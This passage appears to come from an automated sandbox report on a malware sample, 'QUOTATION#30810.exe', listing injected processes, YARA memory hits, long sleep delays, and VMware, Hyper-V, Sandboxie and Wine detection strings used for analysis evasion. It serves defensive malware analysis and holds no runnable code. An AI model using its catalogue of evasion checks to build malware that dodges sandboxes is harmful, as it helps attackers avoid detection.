                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX

                        Malware Analysis System Evasion

                        barindex
                        Source: Yara matchFile source: Process Memory Space: QUOTATION#30810.exe PID: 4508, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 5864, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 2772, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 5572, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 6908, type: MEMORYSTR
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 26_2_0040F7A7 Sleep,ExitProcess,26_2_0040F7A7
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 45_2_0040F7A7 Sleep,ExitProcess,45_2_0040F7A7
                        Source: QUOTATION#30810.exe, 00000000.00000002.1595193809.000001FC8003B000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1926724115.00000227078A2000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.1861743412.000001E1DDBDB000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000010.00000002.1814204610.00000172222A2000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.1955305299.000001D080302000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000002A.00000002.1926881023.0000017F2EDDB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
                        Source: QUOTATION#30810.exe, 00000000.00000002.1595193809.000001FC8003B000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1926724115.00000227078A2000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.1861743412.000001E1DDBDB000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000010.00000002.1814204610.00000172222A2000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.1955305299.000001D080302000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000002A.00000002.1926881023.0000017F2EDDB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                        Source: C:\Users\user\Desktop\QUOTATION#30810.exeMemory allocated: 1FCF8640000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION#30810.exeMemory allocated: 1FCF9FF0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 227059C0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 2271F5A0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 1E1DC0E0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 1E1F5BA0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 17220520000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 17239FA0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 1D0E85D0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 1D0EA1A0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 17F2D2F0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 17F46DA0000 memory reserve | memory write watch
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 32_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,32_2_0040DD85
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,26_2_0041A748
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,45_2_0041A748
                        Source: C:\Users\user\Desktop\QUOTATION#30810.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWindow / User API: threadDelayed 4784Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWindow / User API: threadDelayed 5017Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWindow / User API: foregroundWindowGot 1763Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeAPI coverage: 6.5 %
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeAPI coverage: 9.8 %
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeAPI coverage: 6.4 %
                        Source: C:\Users\user\Desktop\QUOTATION#30810.exe TID: 6072Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 5952Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 4424Thread sleep count: 54 > 30Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 5792Thread sleep count: 4784 > 30Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 5792Thread sleep time: -14352000s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 5792Thread sleep count: 5017 > 30Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 5792Thread sleep time: -15051000s >= -30000sJump to behavior
                        Source: C:\Windows\System32\svchost.exe TID: 4780Thread sleep time: -30000s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 3952Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Users\user\AppData\Roaming\svchost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Users\user\AppData\Roaming\svchost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Users\user\AppData\Roaming\svchost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 20_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,20_2_100010F1
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 20_2_10006580 FindFirstFileExA,20_2_10006580
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 26_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,26_2_00409253
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 26_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,26_2_0041C291
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 26_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,26_2_0040C34D
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 26_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,26_2_00409665
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 26_2_0044E879 FindFirstFileExA,26_2_0044E879
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 26_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,26_2_0040880C
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 26_2_0040783C FindFirstFileW,FindNextFileW,26_2_0040783C
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 26_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,26_2_00419AF5
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 26_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,26_2_0040BB30
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 26_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,26_2_0040BD37
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 32_2_0040AE51 FindFirstFileW,FindNextFileW,32_2_0040AE51
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 37_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,37_2_00407EF8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 39_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,39_2_00407898
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 45_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,45_2_00409253
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 45_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,45_2_0041C291
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 45_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,45_2_0040C34D
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 45_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,45_2_00409665
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 45_2_0044E879 FindFirstFileExA,45_2_0044E879
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 45_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,45_2_0040880C
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 45_2_0040783C FindFirstFileW,FindNextFileW,45_2_0040783C
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 45_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,45_2_00419AF5
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 45_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,45_2_0040BB30
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 45_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,45_2_0040BD37
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 26_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,26_2_00407C97
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 32_2_00418981 memset,GetSystemInfo,32_2_00418981
                        Source: C:\Users\user\Desktop\QUOTATION#30810.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 922337203685477
                        Source: Amcache.hve.25.drBinary or memory string: VMware
                        Source: Amcache.hve.25.drBinary or memory string: VMware Virtual USB Mouse
                        Source: Amcache.hve.25.drBinary or memory string: vmci.syshbin
                        Source: Amcache.hve.25.drBinary or memory string: VMware-42 27 c5 9a 47 85 d6 84-53 49 ec ec 87 a6 6d 67
                        Source: Amcache.hve.25.drBinary or memory string: VMware, Inc.
                        Source: svchost.exe, 0000002A.00000002.1926881023.0000017F2EDDB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                        Source: Amcache.hve.25.drBinary or memory string: VMware20,1hbin@
                        Source: Amcache.hve.25.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                        Source: Amcache.hve.25.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                        Source: Amcache.hve.25.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                        Source: vbc.exe, 00000014.00000002.4011008508.0000000000507000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000014.00000002.4011620526.00000000005D0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3658163562.0000013DBA8C8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3658106153.0000013DBA8C1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3657864586.0000013DBA82B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                        Source: Amcache.hve.25.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                        Source: svchost.exe, 0000002A.00000002.1926881023.0000017F2EDDB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE
                        Source: svchost.exe, 0000002A.00000002.1926881023.0000017F2EDDB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\'C:\WINDOWS\system32\drivers\vmmouse.sys&C:\WINDOWS\system32\drivers\vmhgfs.sys
                        Source: Amcache.hve.25.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                        Source: svchost.exe, 0000002A.00000002.1926881023.0000017F2EDDB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
                        Source: svchost.exe, 0000002A.00000002.1926881023.0000017F2EDDB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
                        Source: Amcache.hve.25.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                        Source: Amcache.hve.25.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                        Source: Amcache.hve.25.drBinary or memory string: vmci.sys
                        Source: svchost.exe, 0000002A.00000002.1926881023.0000017F2EDDB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\vmmouse.sys
                        Source: Amcache.hve.25.drBinary or memory string: vmci.syshbin`
